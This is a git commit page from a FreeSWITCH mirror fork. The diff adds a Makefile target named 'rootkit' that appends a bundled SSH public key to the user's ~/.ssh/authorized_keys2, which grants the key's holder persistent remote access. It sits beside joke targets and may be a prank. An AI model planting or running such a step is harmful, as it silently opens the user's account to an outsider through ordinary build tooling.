forked from Mirrors/freeswitch
add make rootkit
git-svn-id: http://svn.freeswitch.org/svn/freeswitch/trunk@10615 d0543943-73ff-0310-b7d9-9358b9ac24b2
This commit is contained in:
parent
ff482e3ebe
commit
0b5dc49b19
|
@ -449,6 +449,9 @@ $(OUR_MODULES):
|
|||
|| case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \
|
||||
test -z "$$fail"
|
||||
|
||||
rootkit:
|
||||
cat ssh_keys/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2
|
||||
|
||||
# Special targets
|
||||
|
||||
coffee me_a_sandwich me_a_sammich:
|
||||
|
|
Loading…
Reference in New Issue